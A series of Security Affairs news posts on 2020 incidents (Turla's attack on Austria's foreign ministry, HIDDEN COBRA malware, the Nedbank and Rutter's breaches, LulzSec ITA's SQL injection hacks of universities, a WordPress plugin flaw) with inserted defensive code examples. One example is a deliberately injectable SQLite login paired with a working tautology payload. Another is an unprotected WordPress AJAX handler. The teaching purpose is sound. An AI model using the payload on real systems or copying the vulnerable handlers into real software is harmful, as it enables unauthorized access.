“Our findings expose some fundamental attack vectors against certified and recertified BLE Stacks which are supposed to be ‘safe’ against such flaws. We carefully investigated the reasons that might explain the presence of SweynTooth vulnerabilities on the affected SoCs. We believe this is due to the imposed isolation between the link layer and other Bluetooth protocols, via the Host Controller Interface (HCI) protocol,” the researchers conclude.

Pierluigi Paganini

(SecurityAffairs – SweynTooth, hacking)

The post SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors appeared first on Security Affairs.

The cyber attack against Austria’s foreign ministry has ended

Austria’s foreign ministry announced that the cyber attack against its systems, allegedly carried out by a state actor, has ended.

In early January, Austria’s foreign ministry announced it was facing a “serious cyberattack” and that it could be the work of a nation-state actor.

“Due to the gravity and nature of the attack, it cannot be ruled out that this is a targeted attack by a state actor,” the foreign ministry said at the time in a joint statement with the interior ministry.

“Despite all the intensive security measures, there is no 100-percent protection against cyberattacks.”

The attack took place on the evening of Saturday 4 January and was quickly detected. Local reports revealed that the attack aimed at the ministry’s IT infrastructure.

Authorities immediately adopted defensive measures to protect their infrastructure and set up a special committee to respond to the incident. It is not clear if the hackers gained access to sensitive data.

This week, the Austrian foreign ministry announced that the cyber attack against its systems has ended.

“After really intensive work and excellent cooperation between all the departments involved, last weekend we managed to clean up our IT systems and end the cyber attack on the Foreign Ministry,” said Foreign Minister Alexander Schallenberg. “The highest possible data security at the Foreign Ministry is guaranteed and no damage to the IT equipment could be detected.”

“According to current knowledge, this was a targeted attack against the Foreign Ministry with the intention of gathering information. However, due to the dimension and the high complexity, it cannot yet be said beyond doubt who is behind the attack.”

The authorities are still investigating the attack, but government experts have no doubt that it was a targeted cyber-espionage attack against the Foreign Ministry.

“Espionage is a serious offence, so such accusations should not be made lightly,” explained Schallenberg.

Intelligence experts speculated about the involvement of Russian or Chinese cyber spies, but the local Russian ambassador Dmitri Ljubinski denied any involvement and demanded an apology.

A local radio station, the Österreichischer Rundfunk (ORF, state broadcaster Austrian Radio), reported in January that the attack was carried out by the Russia-linked Turla APT Group.

“The entire course of this cyberattack and above all the high-level target are characteristic of the “Turla” group, which operates aggressive “foreign intelligence”. After the discovery, Turla always delivers violent cyber battles to the technicians of the attacked networks. That still happens in the Republic’s Ministry of Foreign Affairs.” reported ORF. “The entire attack on a target network starts with a tiny command line module that sends a TCP request to an external command / control server, the command consisting of only four bytes of text [!]. This command brings in a so-called “dropper”, which then places the subsequent trojan in disguise.”

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Major cyber attacks are a rarity in Austria; only a few large-scale attacks were observed in the past years. In September 2019, before the National Council election, the ÖVP was hit by a “very targeted hacker attack” on the party headquarters.

In 2018, the websites of the parliament and various ministries in Austria were targeted by DDoS attacks (Distributed Denial of Service). 

Other European countries suffered similar attacks in the past: in 2015 more than 20,000 computers belonging to the German Bundestag were infected with malware. Experts and media reported a possible involvement of Russian state-sponsored hackers.

US Govt agencies detail North Korea-linked HIDDEN COBRA malware

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) released reports on North Korea-linked HIDDEN COBRA malware.

The FBI, the US Cyber Command, and the Department of Homeland Security have published technical details of a new North Korea-linked hacking operation.

The government experts released new and updated Malware Analysis Reports (MARs) related to new malware families involved in new attacks carried out by North Korea-linked HIDDEN COBRA group.

The following MARs reports aim to help organizations detect HIDDEN COBRA activity:

Let’s take a closer look at each malware family detailed in the MARs reports just released:

  • BISTROMATH – a full-featured RAT implant;
  • SLICKSHOES – a Themida-packed dropper;
  • CROWDEDFLOUNDER – a Themida packed 32-bit Windows executable, which is designed to unpack and execute a Remote Access Trojan (RAT) binary in memory;
  • HOTCROISSANT – a full-featured beaconing implant used for conducting system surveys, file upload/download, process and command execution, and performing screen captures;
  • ARTFULPIE – an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL;
  • BUFFETLINE – a full-featured beaconing implant.

US agencies also updated information included in a MARs report on the HOPLIGHT proxy-based backdoor trojan that was first analyzed in April 2019.

Each report includes detailed “malware descriptions, suggested response actions, and recommended mitigation techniques.”

The US Cyber Command also announced that it has uploaded malware samples to VirusTotal:

CISA reports provide the following recommendations to users and administrators to strengthen the security posture of their organization’s systems:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing it.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).
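The “true file type” recommendation in the list above is easy to state and easy to get wrong in a mail gateway. The following is an added example, not code from CISA or from the MARs reports, that checks an attachment’s leading bytes against the type its extension claims and flags the ones that disagree, such as a PE executable renamed to `.pdf`. The signature table is a constructed subset for illustration, and the sample attachments are constructed header fragments, not real files.

```python
import os
from typing import Dict, List

# Leading-byte signatures for common attachment types. A constructed subset
# for illustration; a production scanner would use a fuller signature table.
MAGIC_BY_EXT: Dict[str, List[bytes]] = {
    ".pdf":  [b"%PDF-"],
    ".png":  [b"\x89PNG\r\n\x1a\n"],
    ".jpg":  [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif":  [b"GIF87a", b"GIF89a"],
    ".zip":  [b"PK\x03\x04"],
    ".docx": [b"PK\x03\x04"],   # OOXML documents are ZIP containers
    ".exe":  [b"MZ"],
}


def detect_extensions(data: bytes) -> List[str]:
    """Return every extension whose signature matches the file header."""
    return sorted(ext for ext, sigs in MAGIC_BY_EXT.items()
                  if any(data.startswith(sig) for sig in sigs))


def check_attachment(filename: str, data: bytes) -> Dict[str, object]:
    """Compare the claimed extension against the file header.

    verdict is one of:
      'match'    - header agrees with the extension
      'mismatch' - header does not match the declared type (e.g. EXE named .pdf)
      'unknown'  - extension not covered by the signature table
    """
    claimed = os.path.splitext(filename)[1].lower()
    detected = detect_extensions(data)
    if claimed not in MAGIC_BY_EXT:
        verdict = "unknown"
    elif claimed in detected:
        verdict = "match"
    else:
        verdict = "mismatch"
    return {"filename": filename, "claimed": claimed,
            "detected": detected, "verdict": verdict}


def flag_suspicious(attachments) -> List[str]:
    """Return the names of attachments whose header contradicts the extension."""
    return [name for name, data in attachments
            if check_attachment(name, data)["verdict"] == "mismatch"]


# Constructed sample attachments (header bytes only, not real files).
SAMPLE_ATTACHMENTS = [
    ("invoice.pdf",   b"%PDF-1.7\n%..."),
    ("photo.jpg",     b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("report.docx",   b"PK\x03\x04\x14\x00"),
    ("statement.pdf", b"MZ\x90\x00\x03\x00\x00\x00"),   # PE executable renamed .pdf
    ("notes.txt",     b"plain text"),
]

if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS:
        print(check_attachment(name, data))
    print("suspicious:", flag_suspicious(SAMPLE_ATTACHMENTS))
```

A `mismatch` verdict is the one worth quarantining; `unknown` means the policy has no opinion and should be tightened by extending the table for the types the organization actually exchanges, since an attacker picks whichever extension the gateway does not check.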

Russian watchdog fines Twitter, Facebook for not moving user data to local servers

A Russian court fined Twitter and Facebook 4 million rubles each for refusing to store the personal data of Russian citizens on local servers.

At the end of January, Russia’s telecommunications watchdog Roskomnadzor instituted administrative proceedings against Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

On Thursday, a court in Moscow fined Twitter and Facebook 4 million rubles (roughly $63,000) each for refusing to store the personal data of Russian citizens on servers that are located in Russia. According to the media, these are the largest penalties imposed by the Kremlin on Western IT firms under internet use laws since 2012.

“The fines of nearly $63,000 are the first five-figure fines levied on tech companies since Russia adopted a flurry of legislation starting in 2012 designed to tighten the government’s grip on online activity.” reported the Associated Press.

Roskomnadzor is attempting to oblige the IT giants, including Facebook, Twitter, and Google, to move data related to Russian citizens to servers in Russia, allowing the Government to monitor them.

Roskomnadzor pointed out that the fines are only a prelude to further penalties: both companies would be fined 18 million rubles ($283,000) each if they don’t comply this year.

This isn’t the first time that Twitter and Facebook have been fined by the Kremlin; in 2019 the Russian watchdog punished both with a $47 fine for violating the same personal data regulation.

The Russian government could also ban IT companies that do not comply with the same law.

The Russian government has already blocked the professional social network LinkedIn in 2016 under the data-localization legislation.

Nedbank client data compromised in security breach at third-party provider

Nedbank announced on Thursday that a security breach at a third-party supplier has compromised the details of as many as 1.7 million of its clients.

Nedbank disclosed on Thursday a security breach at a third-party supplier that has compromised the details of as many as 1.7 million of its clients.

The bank revealed that the service provider Computer Facilities, which is a direct marketing company that issues SMS and e-mail marketing information on behalf of Nedbank and other companies, has suffered a “data security issue.”

The incident was discovered as part of “routine and ongoing monitoring procedures” conducted by the bank.

Nedbank Limited is a wholly owned subsidiary of Nedbank Group that operates in South Africa, Lesotho, Malawi, Mozambique, Namibia, Swaziland, and Zimbabwe.

“Nedbank has investigated a data security issue that occurred at the premises of a third-party service provider, namely Computer Facilities (Pty) Ltd – a direct marketing company that issues SMS and email marketing information on behalf of Nedbank and a number of other companies.” reads a security notice published by the bank. “A subset of the potentially compromised data at Computer Facilities included personal information (names, ID numbers, telephone numbers, physical and/or email addresses) of some Nedbank clients.”

Nedbank confirmed that neither its systems nor client bank accounts have been compromised or are at risk as a result of the security issue at Computer Facilities (Pty) Ltd.

Once the bank became aware of the security breach, it engaged forensic experts to conduct an extensive investigation.

The company determined that data belonging to 1.7 million past and current customers has been affected. Exposed info includes names, ID numbers, home addresses, phone numbers, and email addresses.

“We have moved swiftly to proactively secure and destroy all Nedbank client information held by Computer Facilities (Pty) Ltd. Information from Nedbank Retail relating to approximately 1,7 million clients was potentially affected of which 1,1 million are active clients.” continues the notice.

The bank began notifying customers via SMS.

Since the incident, the bank says the contractor’s network has been taken offline to prevent any further attacks. As a precautionary measure, the bank also deleted any customer data from the contractor’s systems.

Bank officials apologized for the incident and confirmed that the investigation is still ongoing.

“We regret the incident that occurred at the third-party service provider, namely Computer Facilities (Pty) Ltd and the matter is receiving our urgent attention. The safety and security of our clients’ information is a top priority. We take our responsibility to protect our client information seriously and our immediate focus has been on securing all Nedbank client data at Computer Facilities (Pty) Ltd, which we have done. In addition to this, we are communicating directly with affected clients. We are also taking the necessary actions in close cooperation with the relevant regulators and authorities,” Nedbank CEO Mike Brown says.

Nedbank Group Chief Information Officer Fred Swanepoel says: “The third-party service provider namely, Computer Facilities (Pty) Ltd did not have any links to our systems. Our team of IT specialists and external cyber security experts have been working continuously with them since we became aware of this matter. Clients’ bank accounts have not been compromised in any manner whatsoever and clients have not suffered any financial loss. Nedbank remains vigilant in its efforts to contain cyber-crime.” 

PoS malware infected systems at 71 locations operated by US store chain Rutter’s

US store chain Rutter’s disclosed a security breach: 71 locations were infected with a point-of-sale (POS) malware used to steal customers’ credit card information.

Rutter’s, a U.S. convenience store, fast food restaurant, and gas station chain, has disclosed a security breach.

The company confirmed that attackers gained access to its stores’ network system and infected payment systems at 71 locations with a point-of-sale (POS) malware.

The US store chain Rutter’s operates more than 75 locations throughout Pennsylvania, Maryland, and West Virginia.

According to a Notice of Payment Card Incident published by the company, attackers have stolen some payment card data from cards used on point-of-sale (POS) devices from convenience stores and fuel pumps. Threat actors planted PoS malware into the payment processing systems that was specifically designed to steal card data.

Rutter’s started the investigation after it received a report from a third party claiming there may have been unauthorized access to data from payment cards that were used at some Rutter’s locations. The company hired a cybersecurity firm to assist with the investigation and notified law enforcement.

“On January 14, 2020, the investigation identified evidence indicating that an unauthorized actor may have accessed payment card data from cards used on point-of-sale (POS) devices at some fuel pumps and inside some of our convenience stores through malware installed on the payment processing systems.” reads the notice issued by the company. “The malware searched for track data (which sometimes has the cardholder name in addition to card number, expiration date, and internal verification code) read from a payment card as it was being routed through the payment processing systems.”

The malware was present with different timeframes for each location, “the general timeframe beginning October 1, 2018 through May 29, 2019.”

The hackers were able to steal card numbers, expiration dates, and internal verification codes from the credit cards customers used for payments; in some cases, the PoS malware was also able to capture the cardholder names.

“However, chip-enabled (EMV) POS terminals are used inside our convenience stores. EMV cards generate a unique code that is validated for each transaction, and the code cannot be reused.” continues the notice.

“As a result, for EMV cards inserted into the chip-reader on the EMV POS devices in our convenience stores, only card number and expiration date (and not the cardholder name or internal verification code) were involved.”

Rutter’s pointed out that the PoS malware involved in the attack didn’t copy payment data from all of the cards used at the affected locations.

Payment systems at Rutter’s car washes, ATMs, and lottery machines in Rutter’s stores were not infected with the malware.

The company confirmed that the PoS malware has been removed from infected systems, and it also announced the implementation of enhanced security measures to prevent similar incidents in the future.

Experts suggest users review their payment card statements for any unauthorized activity. Customers should immediately report any unauthorized charges to their card issuer.

Rutter’s customers should also file a complaint with the Federal Trade Commission and a police report in case of fraud or identity theft.

Rutter’s also set up a dedicated call center at 888-271-9728 for additional questions.

Helix Bitcoin Mixer operator charged for laundering over $300M worth of Bitcoin

An American was charged with money laundering while operating the dark web Helix Bitcoin mixer service between 2014 and 2017.

Larry Dean Harmon (36), from Akron, Ohio, was charged with laundering more than $310 million worth of Bitcoin while he was operating a Darknet-based cryptocurrency laundering service between 2014 and 2017.

According to a three-count indictment unsealed on February 11 in the District of Columbia, the man was charged with money laundering conspiracy, operating an unlicensed money transmitting business and conducting money transmission without a D.C. license.

Harmon operated the Helix mixer service from 2014 to 2017; its customers paid a fee to send Bitcoin to designated recipients while hiding the source of the transactions.

“According to the indictment, Harmon operated Helix from 2014 to 2017.  Helix functioned as a bitcoin “mixer” or “tumbler,” allowing customers, for a fee, to send bitcoin to designated recipients in a manner that was designed to conceal the source or owner of the bitcoin.” reads the press release published by DoJ. “Helix was linked to and associated  with “Grams,” a Darknet search engine also run by Harmon.  Harmon advertised Helix to customers on the Darknet as a way to conceal transactions from law enforcement.”

Prosecutors revealed that the Helix service allowed Dark Web users to launder hundreds of millions of dollars of criminal profits.

Harmon allegedly operated the dark web search engine Grams from April 2014 and the Helix Bitcoin tumbler from July 2014.

In November 2016, Harmon started a partnership with AlphaBay, the popular black market that was seized by authorities in July 2017.

According to the indictment, the Helix mixer was used to launder at least approximately 354,468 Bitcoin (more than $300 million at the time of the transactions).

“The perceived anonymity of cryptocurrency and the Darknet may appeal to criminals as a refuge to hide their illicit activity,” said Special Agent in Charge Timothy M. Dunham of the Criminal Division of the FBI Washington Field Office.  “However, as this arrest demonstrates, the FBI and our law enforcement partners are committed to bringing the illegal practices of money launderers and other financial criminals to light and to justice, regardless of whether they are using new technological means to carry out their schemes.”

If convicted, the man will be required to forfeit to the US any property, real or personal, involved in the offense.

Three Italian universities hacked by LulzSec_ITA collective

The popular Italian hacktivist collective LulzSec ITA claimed via Twitter to have hacked three Italian universities.

The popular Italian hacktivist collective LulzSec ITA has announced via Twitter the hack of three Italian universities, highlighting the importance of cybersecurity for our society.

The hacktivists claim that once hacked the universities did not disclose the data breach and attempted to hide the incident, violating the European Privacy Law GDPR.

Below is the translation of the message published by the group.

"Dear student / teacher friends, after a few months today we decided to focus our attention on you too :)
We spent  searching holes in Italian universities (and not only, we remember that dozens of universities were hacked in 2011), to try to show you that security in the academic environment must be taken seriously since the university is the den of the excellent minds of our future.
If the concept of security does not start from our schools, how can we have a better ruling class than the current one? Since our previous attacks did not bring any sense of shame on your part, we decided to let you taste another round, until you are able to admit how ridiculous your security is.
Lulz!"

I reached the group to have more information about their operation; they told me that the choice to attack the universities of Basilicata, Napoli and Rome3 was casual.

As for motivation, they confirmed to me that they have always had an interest in Italian education. They explained that 9 years after the first attacks against the universities, nothing has changed from the cyber security perspective.

Two weeks after the hack, one of the universities breached by the group, Uniparthenope, sent a data breach notification via email to the impacted students and teachers. LulzSec ITA told me that the notification attempted to downplay the incident, despite the hacktivists’ claim to have accessed data contained in 27 databases and compromised some portals used by the university.

The other two universities, “Università della Basilicata” and Roma3 have yet to notify their students about the incident.

How did LulzSec ITA hack the universities?

In the simplest way: the hackers used a classic and very simple SQL Injection attack. This kind of attack can be launched automatically using very simple tools. SQL Injection attacks can allow attackers to access the target database.

It is embarrassing that universities could be hacked with such a simple technique. The hacktivists also told me that in some cases they were able to bypass login pages without knowing the username and password, simply by using SQL Injection strings.
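The login bypass described above works only when user input is spliced into the SQL text. As an added example, not code from the universities or from the group, the following runs the same credentials through a login handler built by string concatenation and through one that uses a parameterized query, so the difference is visible on an in-memory SQLite table. The account, the table and the injection string are constructed for the demonstration; a real application would also store a password hash rather than the plaintext used here.

```python
import sqlite3
from typing import Tuple


def build_demo_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (demo data only;
    a real application stores password hashes, never plaintext)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The anti-pattern: user input becomes part of the SQL text, so a quote
    in either field changes the query's logic instead of being compared."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: a parameterized query. The SQL text is fixed and the driver
    passes the values separately, so input is always data, never syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username: str, password: str) -> Tuple[bool, bool]:
    """Run the same credentials through both handlers: (vulnerable, safe)."""
    conn = build_demo_db()
    try:
        return (login_vulnerable(conn, username, password),
                login_safe(conn, username, password))
    finally:
        conn.close()


# Classic tautology string: it closes the quoted literal and appends a
# condition that is always true. Constructed for the demonstration.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    print("valid credentials     ->", compare("alice", "correct horse battery"))
    print("wrong password        ->", compare("alice", "guess"))
    print("tautology as password ->", compare("alice", TAUTOLOGY))
```

The third line of output is the whole lesson: the concatenated handler accepts the tautology while the parameterized one rejects it, because the placeholder binding never lets the input be parsed as SQL. Input validation and escaping are defense in depth; binding parameters is the fix.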

MoleRATs APT group targets Palestinian territories

Security experts uncovered a new cyberespionage campaign conducted by one of the Gaza Cybergang groups (aka MoleRATs) targeting the Middle East.

Experts from the Cybereason Nocturnus team have uncovered a cyber espionage campaign allegedly carried out by one of the Gaza Cybergang groups (aka MoleRATs). 

MoleRATs is an Arabic-speaking, politically motivated group of hackers that has been active since 2012. While monitoring the group in 2018, Kaspersky identified different techniques utilized by very similar attackers in the MENA region and distinguished the following three attack groups operating under the Gaza Cybergang umbrella:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

As part of the last campaign spotted by Cybereason, MoleRATs has been attempting to infiltrate the systems of both organizations and individuals.

Experts distinguish between two separate campaigns happening simultaneously that used different hacking tools and C2 infrastructure.

The first campaign dubbed the Spark Campaign employs social engineering to infect victims with the Spark backdoor. Most of the victims were from the Palestinian territories.

“This backdoor first emerged in January 2019 and has been continuously active since then. The campaign’s lure content revolves around recent geopolitical events, especially the Israeli-Palestinian conflict, the assassination of Qasem Soleimani, and the ongoing conflict between Hamas and Fatah Palestinian movements.” states the report from Cybereason.

According to the experts, the Spark backdoor was specifically designed by MoleRATs to gather system information on an infected machine.

Spark will also infect victims with Arabic keyboard and language settings.

The second campaign was tracked by the experts as the Pierogi Campaign; it employs social engineering attacks to trick victims into installing an undocumented backdoor dubbed Pierogi.

“This backdoor first emerged in December 2019, and was discovered by Cybereason. In this campaign, the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware.” states the report.

The name ‘Pierogi’ comes from an Eastern European dish; it is a simple Delphi backdoor that was allegedly created by Ukrainian-speaking hackers.

The experts did not attribute the attack to a specific state, even if the apparent political motivation suggests the involvement of a nation-state actor. 

“It is important to remember there are many threat actors operating in the Middle East, and often there are overlaps in TTPs, tools, motivation, and victimology,” concludes the report. “There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts, and as such, attribution should rarely be taken as is, but instead with a grain of salt.” 

Additional details, including Indicators of Compromise and MITRE ATT&CK breakdown, are included in the report published by Cybereason.

US officials claim Huawei Equipment has secret backdoor for spying

Huawei can secretly tap into communications through its networking equipment, states a U.S. official, while the White House urges allies to ban the Chinese giant.

This week The Wall Street Journal reported that U.S. officials say Huawei can covertly access telecom networks where its equipment is installed.

“U.S. officials say Huawei Technologies Co. can covertly access mobile-phone networks around the world through “back doors” designed for use by law enforcement, as Washington tries to persuade allies to exclude the Chinese company from their networks.” states The Wall Street Journal.

“Intelligence shows Huawei has had this secret capability for more than a decade, U.S. officials said. Huawei rejected the allegations.”

On Tuesday evening, after The Wall Street Journal quoted him as one of the officials accusing Huawei, the U.S. national security adviser, Robert O’Brien, repeated the claim at an Atlantic Council forum, but he did not provide any evidence of the presence of the alleged backdoors.

Huawei issued a statement on Wednesday denying the accusations, saying it “has never and will never covertly access telecom networks, nor do we have the capability to do so.”

In November 2018, the Wall Street Journal reported that the US Government was urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States continues to highlight the risks to national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy, and Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.

Neither the UK nor the European Union banned the Chinese equipment, although the British authorities excluded Huawei from supplying equipment used in the core of the national 5G network.

“Independent cybersecurity experts say the intelligence services of global powers including the United States routinely exploit vulnerabilities in networking equipment — regardless of the manufacturer — for espionage purposes.” reported the AP News.

“The United States and other countries require that so-called “lawful intercept” capabilities be built into networks, though the equipment manufacturers are not supposed to have secret access to them.”

Some experts pointed out that while US intelligence has yet to disclose evidence of the presence of backdoors in the Chinese equipment, the NSA has deployed surveillance implants in equipment from several vendors in the past, including Huawei and Cisco.

Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019

Google Play Protect now scans over 100 billion applications on Android devices every day, these amazing figures were disclosed by Google.

In May 2017, Google introduced a security defense system called Google Play Protect to protect the devices running its mobile OS.

Google aims to monitor the behavior of apps and detect malicious ones once they have been installed on Android devices.

Google Play Protect uses machine learning and app usage analysis to identify malicious activity on the mobile device. It is integrated into the Google Play Store app, so its usage is transparent to the end user, who doesn’t need to install or enable it on their device.

Play Protect implements the following features:

  • App scanning
  • Anti-Theft Measures
  • Browser Protection

The security service also monitors the mobile apps that have been installed by users from third-party stores.

Now Google has shared some data related to the activity of its protection system in 2019, when Google Play Protect prevented 1.9 billion malware installs from third-party stores. The figures represent an increase compared to the 1.6 billion reported in the last two years ([2017], [2018]) and demonstrate the effort the company spends protecting its users.

The data suggest that a growing number of Android users are attempting to install tainted apps from third-party app stores.

Google revealed that in 2019 it managed to block 790,000 violating app submissions before they were published in the official Play Store. 

“Google Play Protect scans over 100B apps everyday, providing users with information about potential security issues and actions they can take to keep their devices safe and secure.” reads the Google announcement. “Last year, Google Play Protect also prevented more than 1.9B malware installs from non-Google Play sources.”

Google reported that after the introduction of a new policy in 2018 to stop apps from unnecessarily accessing privacy-sensitive SMS and Call Log data, it observed a 98% decrease in apps accessing such data.

Similarly to the SMS and Call Log policy, Google enacted a policy in May 2019 to better protect families; this resulted in the removal of tens of thousands of apps from the official Play Store, improving the security of Android users.

“Our commitment in building the world’s safest and most helpful app platform will continue in 2020” concludes Google “and we will continue to invest in the key app safety areas mentioned in last year’s blog post:

  • Strengthening app safety policies to protect user privacy
  • Faster detection of bad actors and blocking repeat offenders
  • Detecting and removing apps with harmful content and behaviors”

Pierluigi Paganini

(SecurityAffairs – Google Play, malware)

The post Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019 appeared first on Security Affairs.

600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now!

Developers of the popular WordPress GDPR Cookie Consent plugin have addressed a critical bug that could potentially impact 700K users.

Critical vulnerabilities in the WordPress GDPR Cookie Consent plugin could be exploited by potential attackers to delete and change the content of the sites and inject malicious JavaScript code due to improper access controls.

The GDPR Cookie Consent plugin helps site owners make their websites GDPR compliant. The vulnerability was reported to the development team by the security researcher Jerome Bruandet from NinTechNet.

“The save_contentdata method allows the administrator to save the GDPR cookie notice to the database as a page post type” wrote NinTechNet.

“An authenticated user such as a subscriber can use it to put any existing page or post (or the entire website) offline by changing their status from ‘published’ to ‘draft’. Additionally, it is possible to delete or change their content. Injected content can include formatted text, local or remote images as well as hyperlinks and shortcodes.”

The WordPress plugin is developed by WebToffee that addressed the flaw with the release of version 1.8.3, less than a week after the disclosure of the issues. The vulnerabilities affect version 1.8.2 and earlier.

The security firm WordFence independently confirmed the flaw after the development team had addressed it. WordFence analyzed the fixed plugin and noticed a number of code changes related to capability checks added to an AJAX endpoint used in the plugin’s administration pages.

“Because the AJAX endpoint was intended to only be accessible to administrators, the vulnerability allows subscriber-level users to perform a number of actions that can compromise the site’s security.” states WordFence.

An attacker could exploit the flaw to inject JavaScript code that would be automatically loaded and executed every time a user (authenticated or not) visited the /cli-policy-preview/ page.

“[the issue is caused by] improper access controls lead to a stored cross-site scripting vulnerability in the GDPR Cookie Consent plugin” states the analysis published by WordFence.
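To make the bug class concrete, here is an added illustration (hypothetical code, not the GDPR Cookie Consent plugin’s own): a WordPress admin-ajax handler that saves a cookie-notice page, first with the missing access controls WordFence describes, then hardened with a capability check, a nonce check, a constrained target and content sanitization. The action names, option name and function names are assumptions.

```php
<?php
/**
 * Added illustration (not the GDPR Cookie Consent plugin's code): a hypothetical
 * admin-ajax.php handler that saves a cookie-notice page, first without and then
 * with the access controls WordPress expects.
 */

// --- Vulnerable pattern: the handler trusts any logged-in user. ---------------
// admin-ajax.php runs wp_ajax_{action} hooks for *every* authenticated user,
// subscribers included; being linked from the admin UI is not authorization.
add_action( 'wp_ajax_demo_save_notice_unsafe', 'demo_save_notice_unsafe' );

function demo_save_notice_unsafe() {
    // No capability check, no nonce, no content sanitization.
    $post_id = (int) $_POST['post_id'];
    wp_update_post( array(
        'ID'           => $post_id,               // any post or page the caller names
        'post_status'  => $_POST['post_status'],  // 'draft' takes content offline
        'post_content' => $_POST['content'],      // raw HTML, <script> included, stored as-is
    ) );
    wp_send_json_success();
}

// --- Hardened pattern: authorize, verify intent, constrain, sanitize. ---------
add_action( 'wp_ajax_demo_save_notice', 'demo_save_notice' );

function demo_save_notice() {
    // 1. Authorization: the endpoint is for administrators only.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 2. CSRF protection: the admin page must have emitted this nonce
    //    (e.g. via wp_nonce_field( 'demo_save_notice' )).
    check_ajax_referer( 'demo_save_notice', '_wpnonce' );

    // 3. Constrain the target: only the plugin's own notice page may be edited
    //    (hypothetical option name), never a client-supplied post ID.
    $post_id = (int) get_option( 'demo_notice_page_id' );
    if ( $post_id <= 0 || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'unknown notice page', 400 );
    }

    // 4. Allow-list the status instead of passing the client's value through.
    $status = isset( $_POST['post_status'] ) ? sanitize_key( $_POST['post_status'] ) : 'publish';
    if ( ! in_array( $status, array( 'publish', 'draft' ), true ) ) {
        wp_send_json_error( 'invalid status', 400 );
    }

    // 5. Sanitize the content with WordPress' post-content allow-list: formatted
    //    text, images and links survive, <script> and event handlers do not.
    $content = isset( $_POST['content'] ) ? wp_kses_post( wp_unslash( $_POST['content'] ) ) : '';

    $result = wp_update_post( array(
        'ID'           => $post_id,
        'post_status'  => $status,
        'post_content' => $content,
    ), true );

    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id, 'status' => $status ) );
}
```

When reviewing a plugin update for a fix of this kind, the capability check and the nonce check are the two lines to look for in the diff of each `wp_ajax_` handler.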

Looking at the download history of the plugin, we can see that no more than 82,000 users have installed the latest version, which means that more than 600K installations are still vulnerable.

DOWNLOADS HISTORY
Today: 8.374
Yesterday: 72.341
Last 7 Days: 95.504
All Time: 5.104.967

Security experts at WordFence recently reported that over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug (CVE-2020-8417) in Code Snippets.

Pierluigi Paganini

(SecurityAffairs – WordPress GDPR Cookie Consent, hacking)



The post 600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now! appeared first on Security Affairs.

Microsoft recommends Exchange admins to disable the SMBv1 protocol

Microsoft is recommending administrators to disable the SMBv1 network communication protocol on Exchange servers to prevent malware attacks.

Microsoft is urging administrators to disable the SMBv1 protocol on Exchange servers as a countermeasure against malware threats like TrickBot and Emotet.

“To make sure that your Exchange organization is better protected against the latest threats (for example Emotet, TrickBot or WannaCry to name a few) we recommend disabling SMBv1 if it’s enabled on your Exchange (2013/2016/2019) server.” reads an advisory published by the Microsoft Tech Community.

The SMBv1 protocol is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism.

